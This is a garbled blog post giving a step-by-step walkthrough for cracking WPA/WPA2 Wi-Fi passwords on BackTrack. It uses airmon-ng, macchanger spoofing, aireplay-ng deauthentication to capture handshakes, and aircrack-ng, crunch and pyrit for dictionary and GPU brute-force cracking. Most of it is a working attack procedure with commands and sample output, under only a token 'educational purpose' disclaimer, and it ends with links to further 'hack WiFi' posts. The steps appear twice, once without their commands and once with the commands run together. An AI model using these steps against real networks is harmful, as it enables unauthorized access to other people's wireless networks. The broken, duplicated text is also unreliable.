I have also posted other methods in my previous posts WEP Password Cracker and WiFi Hack AIO 2010 .
The Information Given Here Is Just For Educational Purpose. I am not responsible for any misuse of this knowledge.
WARNING:Don't Hack any authorized router,otherwise you'll be put into jail.
Rules to Follow
The Information Given Here Is Just For Educational Purpose. I am not responsible for any misuse of this knowledge.
WARNING:Don't Hack any authorized router,otherwise you'll be put into jail.
Rules to Follow
- A Backtrack Live CD: the Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started.
- here a link to download it http://www.backtrack-linux.org/downloads/
- A nearby WEP-enabled Wi-Fi network
- Patience with the command line. This is an ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.
Step
1 :
The result will be something like :
Step 2 :
Step 3 (Optional) :
Change the mac address of the mon0 interface.
Step 4 :
Then, press "
Step 5 :
*where -c is the channel
-w is the file to be written
--bssid is the BSSID
This terminal is keeping running.
Step 6 :
open another terminal.
*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.
Step 7 :
Use the John the Ripper as word list to crack the WPA/WP2 password.
Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,
If you do not want to use John the Ripper as word list, you can use Crunch.
Go to the official site of crunch.
Download crunch 3.0 (the current version at the time of this writing).
*where
(B) nVidia Display Card with CUDA
If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.
Step a :
The result will be something like :
Step b :
Step c (Optional) :
Change the mac address of the mon0 interface.
Step d :
Then, press "
Step e :
Step f :
open another terminal.
*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.
Step g :
If the following programs are not yet installed, please do it.
Step h :
Go to the official site of crunch.
Download
Step i :
Go to the official site of pyrit.
Download
Step j :
*where
Step k (Optional) :
If you encounter error when reading the
*where
Step l :
Then, you will see something similar to the following.
Remarks :
If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.
To test if your wireless card (either USB or PCI-e) can do the injection or not :
Open another terminal.
airmon-ngThe result will be something like :
Interface Chipset Driverwlan0 Intel
5100 iwlagn - [phy0]Step 2 :
airmon-ng start wlan0Step 3 (Optional) :
Change the mac address of the mon0 interface.
ifconfig mon0 downmacchanger
-m 00:11:22:33:44:55 mon0ifconfig
mon0 upStep 4 :
airodump-ng mon0Then, press "
Ctrl+c" to break the program.Step 5 :
airodump-ng -c 3 -w wpacrack --bssid
ff:ff:ff:ff:ff:ff --ivs mon0*where -c is the channel
-w is the file to be written
--bssid is the BSSID
This terminal is keeping running.
Step 6 :
open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c
99:88:77:66:55:44 mon0*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.
Step 7 :
Use the John the Ripper as word list to crack the WPA/WP2 password.
aircrack-ng -w
/pentest/passwords/john/password.lst wpacrack-01.ivsStep 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,
If you do not want to use John the Ripper as word list, you can use Crunch.
Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/downloadtar -xvzf crunch-3.0.tgzcd
crunch-3.0makemake
install/pentest/passwords/crunch/crunch 8 16 -f
/pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv |
aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w - *where
8 16 is
the length of the password, i.e. from 8 characters to 16 characters.(B) nVidia Display Card with CUDA
If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.
Step a :
airmon-ngThe result will be something like :
Interface Chipset Driverwlan0 Intel
5100 iwlagn - [phy0]Step b :
airmon-ng start wlan0Step c (Optional) :
Change the mac address of the mon0 interface.
ifconfig mon0 downmacchanger
-m 00:11:22:33:44:55 mon0ifconfig
mon0 upStep d :
airodump-ng mon0Then, press "
Ctrl+c" to break the program.Step e :
airodump-ng -c 3 -w wpacrack --bssid
ff:ff:ff:ff:ff:ff mon0Step f :
open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c
99:88:77:66:55:44 mon0*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.
Step g :
If the following programs are not yet installed, please do it.
apt-get install libghc6-zlib-dev libssl-dev
python-dev libpcap-dev python-scapyStep h :
Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/Download
crunch 3.0 (the current version at the time of this
writing).http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/downloadtar -xvzf crunch-3.0.tgzcd
crunch-3.0makemake
installStep i :
Go to the official site of pyrit.
http://code.google.com/p/pyrit/downloads/listDownload
pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of
this writing).tar -xzvf pyrit-0.4.0.tar.gzcd
pyrit-0.4.0python
setup.py buildsudo
python setup.py installtar -xzvf cpyrit-cuda-0.4.0.tar.gzcd
cpyrit-cuda-0.4.0python
setup.py buildsudo
python setup.py installStep j :
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst
mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b
ff:ff:ff:ff:ff:ff -i - attack_passthrough*where
8 16 is
the length of the password, i.e. from 8 characters to 16 characters.Step k (Optional) :
If you encounter error when reading the
wpacrack-01.cap,
you should do the following step.pyrit -r wpacrack-01.cap -o new.cap stripLive/pentest/passwords/crunch/crunch 8 16 -f
/pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit
--all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough*where
8 16 is
the length of the password, i.e. from 8 characters to 16 characters.Step l :
Then, you will see something similar to the following.
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg
http://pyrit.googlecode.comThis
code is distributed under the GNU General Public License v3+Parsing
file 'new.cap' (1/1)...Parsed
71 packets (71 802.11-packets), got 55 AP(s)Tried
17960898 PMKs so far; 17504 PMKs per second.Remarks :
If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.
To test if your wireless card (either USB or PCI-e) can do the injection or not :
airodump-ng mon0Open another terminal.
aireplay-ng -9 mon0
Make
sure pyrit workable on your system :
That's all! See you.
If above methods can't works for you then you can also try these
Hack Wifi Password In Windows
Wifi Password Hack
How To Hack Into Computers Through WiFi
pyrit list_coresThat's all! See you.
If above methods can't works for you then you can also try these
Hack Wifi Password In Windows
Wifi Password Hack
How To Hack Into Computers Through WiFi
0 comments:
Post a Comment